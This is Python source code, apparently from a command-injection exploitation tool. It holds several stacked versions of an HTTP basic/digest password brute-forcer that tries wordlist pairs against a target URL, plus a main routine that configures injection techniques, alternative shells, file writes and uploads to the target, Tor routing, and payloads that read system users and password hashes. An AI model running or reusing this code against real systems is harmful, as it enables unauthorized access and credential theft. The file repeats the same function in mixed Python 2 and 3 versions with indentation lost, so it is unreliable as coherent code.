def http_auth_cracker(url, realm):
# Define the HTTP authentication type.
authentication_type = menu.options.auth_type
# Define the authentication wordlists for usernames / passwords.
usernames, passwords = define_wordlists()
i = 1
found = False
total = len(usernames) * len(passwords)
for username in usernames:
for password in passwords:
float_percent = "{0:.1f}%".format(round(((i*100)/(total*1.0)),2))
try:
# Basic authentication
if authentication_type.lower() == "basic":
request = urllib2.Request(url)
base64string = base64.encodestring(username + ":" + password)[:-1]
request.add_header("Authorization", "Basic " + base64string)
result = urllib2.urlopen(request)
# Digest authentication
elif authentication_type.lower() == "digest":
authhandler = urllib2.HTTPDigestAuthHandler()
authhandler.add_password(realm, url, username, password)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
result = urllib2.urlopen(url)
# Store valid results to session
admin_panel = url
session_handler.import_valid_credentials(url, authentication_type, admin_panel, username, password)
found = True
except KeyboardInterrupt :
raise
except:
pass
if found:
float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
if str(float_percent) == "100.0%":
float_percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
i = i + 1
sys.stdout.write("\r\r" + settings.INFO_SIGN + "Checking for a valid pair of credentials... [ " + float_percent + " ]")
sys.stdout.flush()
if found:
valid_pair = "" + username + ":" + password + ""
print Style.BRIGHT + "\n(!) Identified a valid pair of credentials '" + Style.UNDERLINE + valid_pair + Style.RESET_ALL + Style.BRIGHT + "'." + Style.RESET_ALL
return valid_pair
error_msg = "Use the '--auth-cred' option to provide a valid pair of "
error_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") "
error_msg += "or place an other dictionary into '" + os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory."
print "\n" + Back.RED + settings.ERROR_SIGN + error_msg + Style.RESET_ALL
return False
#eof
def http_auth_cracker(url, realm):
# Define the HTTP authentication type.
authentication_type = menu.options.auth_type
# Define the authentication wordlists for usernames / passwords.
usernames, passwords = define_wordlists()
i = 1
found = False
total = len(usernames) * len(passwords)
for username in usernames:
for password in passwords:
float_percent = "{0:.1f}%".format(
round(((i * 100) / (total * 1.0)), 2))
# Check if verbose mode on
if settings.VERBOSITY_LEVEL >= 1:
payload = "pair of credentials '" + username + ":" + password + "'"
sys.stdout.write("\r" + settings.print_checking_msg(payload) +
" ")
sys.stdout.flush()
try:
# Basic authentication
if authentication_type.lower() == "basic":
request = urllib2.Request(url)
base64string = base64.encodestring(username + ":" +
password)[:-1]
request.add_header("Authorization",
"Basic " + base64string)
result = urllib2.urlopen(request)
# Digest authentication
elif authentication_type.lower() == "digest":
authhandler = urllib2.HTTPDigestAuthHandler()
authhandler.add_password(realm, url, username, password)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
result = urllib2.urlopen(url)
# Store valid results to session
admin_panel = url
session_handler.import_valid_credentials(
url, authentication_type, admin_panel, username, password)
found = True
except KeyboardInterrupt:
raise
except:
pass
if found:
if not settings.VERBOSITY_LEVEL >= 1:
float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
if str(float_percent) == "100.0%":
if not settings.VERBOSITY_LEVEL >= 1:
float_percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
i = i + 1
if not settings.VERBOSITY_LEVEL >= 1:
info_msg = "Checking for a valid pair of credentials... [ " + float_percent + " ]"
sys.stdout.write("\r\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
if found:
valid_pair = "" + username + ":" + password + ""
print ""
success_msg = "Identified a valid pair of credentials '"
success_msg += valid_pair + Style.RESET_ALL + Style.BRIGHT + "'."
print settings.print_success_msg(success_msg)
return valid_pair
err_msg = "Use the '--auth-cred' option to provide a valid pair of "
err_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") "
err_msg += "or place an other dictionary into '"
err_msg += os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory."
print "\n" + settings.print_critical_msg(err_msg)
return False
#eof
def http_auth_cracker(url, realm):
settings.PERFORM_CRACKING = True
# Define the HTTP authentication type.
authentication_type = menu.options.auth_type
# Define the authentication wordlists for usernames / passwords.
usernames, passwords = define_wordlists()
i = 1
found = False
total = len(usernames) * len(passwords)
for username in usernames:
for password in passwords:
float_percent = "{0:.1f}%".format(
round(((i * 100) / (total * 1.0)), 2))
# Check if verbose mode on
if settings.VERBOSITY_LEVEL != 0:
payload = "" + username + ":" + password + ""
if settings.VERBOSITY_LEVEL >= 2:
print(settings.print_checking_msg(payload))
else:
sys.stdout.write("\r" +
settings.print_checking_msg(payload) +
" " * 10)
sys.stdout.flush()
try:
# Basic authentication
if authentication_type.lower() == "basic":
authhandler = _urllib.request.HTTPBasicAuthHandler()
# Digest authentication
elif authentication_type.lower() == "digest":
authhandler = _urllib.request.HTTPDigestAuthHandler()
authhandler.add_password(realm, url, username, password)
opener = _urllib.request.build_opener(authhandler)
_urllib.request.install_opener(opener)
request = _urllib.request.Request(url)
headers.do_check(request)
headers.check_http_traffic(request)
# Check if defined any HTTP Proxy (--proxy option).
if menu.options.proxy:
proxy.use_proxy(request)
# Check if defined Tor (--tor option).
elif menu.options.tor:
tor.use_tor(request)
response = _urllib.request.urlopen(request,
timeout=settings.TIMEOUT)
# Store valid results to session
admin_panel = url
session_handler.import_valid_credentials(
url, authentication_type, admin_panel, username, password)
found = True
except KeyboardInterrupt:
raise
except (_urllib.error.HTTPError, _urllib.error.URLError):
pass
if found:
if settings.VERBOSITY_LEVEL == 0:
float_percent = settings.info_msg
else:
if str(float_percent) == "100.0%":
if settings.VERBOSITY_LEVEL == 0:
float_percent = settings.FAIL_STATUS
else:
i = i + 1
float_percent = ".. (" + float_percent + ")"
if settings.VERBOSITY_LEVEL == 0:
info_msg = "Checking for a valid pair of credentials."
info_msg += float_percent
sys.stdout.write("\r\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
if found:
valid_pair = "" + username + ":" + password + ""
if not settings.VERBOSITY_LEVEL >= 2:
print(settings.SINGLE_WHITESPACE)
info_msg = "Identified a valid pair of credentials '"
info_msg += valid_pair + Style.RESET_ALL + Style.BRIGHT + "'."
print(settings.print_bold_info_msg(info_msg))
return valid_pair
err_msg = "Use the '--auth-cred' option to provide a valid pair of "
err_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") "
err_msg += "or place an other dictionary into '"
err_msg += os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory."
print("\n" + settings.print_critical_msg(err_msg))
return False
# eof
def http_basic(url):
authentication_type = "basic"
try:
usernames = []
if not os.path.isfile(settings.USERNAMES_TXT_FILE):
print Back.RED + settings.ERROR_SIGN + "The username file (" + settings.USERNAMES_TXT_FILE + ") is not found" + Style.RESET_ALL
sys.exit(0)
if len(settings.USERNAMES_TXT_FILE) == 0:
print Back.RED + settings.ERROR_SIGN + "The " + settings.USERNAMES_TXT_FILE + " file is empty."
sys.exit(0)
with open(settings.USERNAMES_TXT_FILE, "r") as f:
for line in f:
line = line.strip()
usernames.append(line)
except IOError:
print Back.RED + settings.ERROR_SIGN + " Check if the " + settings.USERNAMES_TXT_FILE + " file is readable or corrupted."
sys.exit(0)
try:
passwords = []
if not os.path.isfile(settings.PASSWORDS_TXT_FILE):
print Back.RED + settings.ERROR_SIGN + "The password file (" + settings.PASSWORDS_TXT_FILE + ") is not found" + Style.RESET_ALL
sys.exit(0)
if len(settings.PASSWORDS_TXT_FILE) == 0:
print Back.RED + settings.ERROR_SIGN + "The " + settings.PASSWORDS_TXT_FILE + " file is empty."
exit()
with open(settings.PASSWORDS_TXT_FILE, "r") as f:
for line in f:
line = line.strip()
passwords.append(line)
except IOError:
print Back.RED + settings.ERROR_SIGN + " Check if the " + settings.PASSWORDS_TXT_FILE + " file is readable or corrupted."
sys.exit(0)
i = 1
found = False
total = len(usernames) * len(passwords)
for username in usernames:
for password in passwords:
float_percent = "{0:.1f}%".format(round(((i*100)/(total*1.0)),2))
try:
request = urllib2.Request(url)
base64string = base64.encodestring(username + ":" + password)[:-1]
request.add_header("Authorization", "Basic " + base64string)
result = urllib2.urlopen(request)
# Store results to session
admin_panel = url
session_handler.import_valid_credentials(url, authentication_type, admin_panel, username, password)
found = True
except KeyboardInterrupt :
raise
except:
pass
if found:
float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
if str(float_percent) == "100.0%":
float_percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
i = i + 1
sys.stdout.write("\r\r" + settings.INFO_SIGN + "Checking for a valid pair of credentials... [ " + float_percent + " ]")
sys.stdout.flush()
if found:
valid_pair = "" + username + ":" + password + ""
print Style.BRIGHT + "\n(!) Identified a valid pair of credentials '" + Style.UNDERLINE + valid_pair + Style.RESET_ALL + Style.BRIGHT + "'." + Style.RESET_ALL
return valid_pair
error_msg = "Use the '--auth-cred' option to provide a valid pair of "
error_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") "
error_msg += "or place an other dictionary into '" + os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory."
print "\n" + Back.RED + settings.ERROR_SIGN + error_msg + Style.RESET_ALL
return False
#eof
def main(filename, url):
try:
# Ignore the mathematic calculation part (Detection phase).
if menu.options.skip_calc:
settings.SKIP_CALC = True
if menu.options.enable_backticks:
settings.USE_BACKTICKS = True
# Target URL reload.
if menu.options.url_reload and menu.options.data:
settings.URL_RELOAD = True
if menu.options.header is not None and settings.INJECT_TAG in menu.options.header or \
menu.options.headers is not None and settings.INJECT_TAG in menu.options.headers:
info_msg = "Injection marker found in option '--header(s)/--user-agent/--referer/--cookie'."
print(settings.print_info_msg(info_msg))
if menu.options.test_parameter:
err_msg = "The options '-p' and the injection marker cannot be used "
err_msg += "simultaneously (i.e. only one option must be set)."
print(settings.print_critical_msg(err_msg))
raise SystemExit
if menu.options.test_parameter and menu.options.skip_parameter:
if type(menu.options.test_parameter) is bool:
menu.options.test_parameter = None
else:
err_msg = "The options '-p' and '--skip' cannot be used "
err_msg += "simultaneously (i.e. only one option must be set)."
print(settings.print_critical_msg(err_msg))
raise SystemExit
if menu.options.ignore_session:
# Ignore session
session_handler.ignore(url)
# Check provided parameters for tests
if menu.options.test_parameter or menu.options.skip_parameter:
if menu.options.test_parameter != None:
if menu.options.test_parameter.startswith("="):
menu.options.test_parameter = menu.options.test_parameter[
1:]
settings.TEST_PARAMETER = menu.options.test_parameter.split(
settings.PARAMETER_SPLITTING_REGEX)
elif menu.options.skip_parameter != None:
if menu.options.skip_parameter.startswith("="):
menu.options.skip_parameter = menu.options.skip_parameter[
1:]
settings.TEST_PARAMETER = menu.options.skip_parameter.split(
settings.PARAMETER_SPLITTING_REGEX)
for i in range(0, len(settings.TEST_PARAMETER)):
if "=" in settings.TEST_PARAMETER[i]:
settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[
i].split("=")[0]
# Check injection level, due to the provided testable parameters.
if menu.options.level < 2 and menu.options.test_parameter != None:
checks.check_injection_level()
# Check if defined character used for splitting cookie values.
if menu.options.cdel:
settings.COOKIE_DELIMITER = menu.options.cdel
# Check for skipping injection techniques.
if menu.options.skip_tech:
settings.SKIP_TECHNIQUES = True
menu.options.tech = menu.options.skip_tech
# Check if specified wrong injection technique
if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES:
found_tech = False
# Convert injection technique(s) to lowercase
menu.options.tech = menu.options.tech.lower()
# Check if used the ',' separator
if settings.PARAMETER_SPLITTING_REGEX in menu.options.tech:
split_techniques_names = menu.options.tech.split(
settings.PARAMETER_SPLITTING_REGEX)
else:
split_techniques_names = menu.options.tech.split()
if split_techniques_names:
for i in range(0, len(split_techniques_names)):
if len(menu.options.tech) <= 4:
split_first_letter = list(menu.options.tech)
for j in range(0, len(split_first_letter)):
if split_first_letter[
j] in settings.AVAILABLE_TECHNIQUES:
found_tech = True
else:
found_tech = False
if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and \
found_tech == False:
err_msg = "You specified wrong value '" + split_techniques_names[
i]
err_msg += "' as injection technique. "
err_msg += "The value for '"
if not settings.SKIP_TECHNIQUES:
err_msg += "--technique"
else:
err_msg += "--skip-technique"
err_msg += "' must be a string composed by the letters C, E, T, F. "
err_msg += "Refer to the official wiki for details."
print(settings.print_critical_msg(err_msg))
raise SystemExit()
if not menu.options.tech:
menu.options.tech = ""
# Check if specified wrong alternative shell
if menu.options.alter_shell:
if menu.options.alter_shell.lower(
) not in settings.AVAILABLE_SHELLS:
err_msg = "'" + menu.options.alter_shell + "' shell is not supported!"
print(settings.print_critical_msg(err_msg))
raise SystemExit()
# Check the file-destination
if menu.options.file_write and not menu.options.file_dest or \
menu.options.file_upload and not menu.options.file_dest:
err_msg = "Host's absolute filepath to write and/or upload, must be specified (i.e. '--file-dest')."
print(settings.print_critical_msg(err_msg))
raise SystemExit()
if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None:
err_msg = "You must enter the '--file-write' or '--file-upload' parameter."
print(settings.print_critical_msg(err_msg))
raise SystemExit()
# Check if defined "--url" or "-m" option.
if url:
if menu.options.auth_cred and menu.options.auth_type:
info_msg = "Used a valid pair of " + menu.options.auth_type
info_msg += " HTTP authentication credentials '" + menu.options.auth_cred + "'."
print(settings.print_bold_info_msg(info_msg))
session_handler.import_valid_credentials(url, authentication_type=menu.options.auth_type, \
admin_panel=url, username=menu.options.auth_cred.split(":")[0], \
password=menu.options.auth_cred.split(":")[1]
)
# Load the crawler
if menu.options.crawldepth > 0 or menu.options.sitemap_url:
url = crawler.crawler(url)
try:
if menu.options.flush_session:
session_handler.flush(url)
# Check for CGI scripts on url
checks.check_CGI_scripts(url)
# Modification on payload
if not menu.options.shellshock:
if not settings.USE_BACKTICKS:
settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")"
settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")"
# Check if defined "--file-upload" option.
if menu.options.file_upload:
checks.file_upload()
try:
_urllib.request.urlopen(menu.options.file_upload,
timeout=settings.TIMEOUT)
except _urllib.error.HTTPError as err_msg:
print(settings.print_critical_msg(str(err_msg.code)))
raise SystemExit()
except _urllib.error.URLError as err_msg:
print(
settings.print_critical_msg(
str(err_msg.args[0]).split("] ")[1] + "."))
raise SystemExit()
try:
# Webpage encoding detection.
requests.encoding_detection(response)
# Procedure for target application identification
requests.application_identification(url)
# Specifies the technology supporting the web application
requests.technology_detection(response)
if response.info()['server']:
server_banner = response.info()['server']
# Procedure for target server's operating system identification.
requests.check_target_os(server_banner)
# Procedure for target server identification.
requests.server_identification(server_banner)
# Store the Server's root dir
settings.DEFAULT_WEB_ROOT = settings.WEB_ROOT
if menu.options.is_admin or menu.options.is_root and not menu.options.current_user:
menu.options.current_user = True
# Define Python working directory.
checks.define_py_working_dir()
# Check for wrong flags.
checks.check_wrong_flags()
else:
found_os_server = checks.user_defined_os()
except KeyError:
pass
except AttributeError:
pass
# Load tamper scripts
if menu.options.tamper:
checks.tamper_scripts()
except _urllib.error.HTTPError as err_msg:
# Check the codes of responses
if str(err_msg.getcode()) == settings.INTERNAL_SERVER_ERROR:
print(settings.SPACE)
content = err_msg.read()
raise SystemExit()
# Invalid permission to access target URL page.
elif str(err_msg.getcode()) == settings.FORBIDDEN_ERROR:
if settings.VERBOSITY_LEVEL < 2:
print(settings.SPACE)
err_msg = "You don't have permission to access this page."
print(settings.print_critical_msg(err_msg))
raise SystemExit()
# The target host seems to be down!
elif str(err_msg.getcode()) == settings.NOT_FOUND_ERROR:
if settings.VERBOSITY_LEVEL < 2:
print(settings.SPACE)
err_msg = "Not found."
print(settings.print_critical_msg(err_msg))
raise SystemExit()
else:
raise
# The target host seems to be down!
except (_urllib.error.URLError, _http_client.BadStatusLine) as e:
if settings.VERBOSITY_LEVEL < 2:
print(settings.SPACE)
err_msg = "The host seems to be down"
try:
err_msg += " (" + str(e.args[0]).split("] ")[1] + ")."
except IndexError:
err_msg += "."
pass
print(settings.print_critical_msg(err_msg))
raise SystemExit()
except _http_client.InvalidURL as err_msg:
print(settings.print_critical_msg(err_msg))
raise SystemExit()
except AttributeError:
pass
else:
err_msg = "You must specify the target URL."
print(settings.print_critical_msg(err_msg))
raise SystemExit()
# Retrieve everything from the supported enumeration options.
if menu.options.enum_all:
checks.enable_all_enumeration_options()
# Launch injection and exploitation controller.
controller.do_check(url, filename)
return filename
# Accidental stop / restart of the target host server.
except (_http_client.BadStatusLine, SocketError) as err_msg:
if settings.VERBOSITY_LEVEL != 0:
print(settings.SPACE)
err_msg = "The target host is not responding."
err_msg += " Please ensure that is up and try again."
print("\n" + settings.print_critical_msg(err_msg))
logs.print_logs_notification(filename, url)
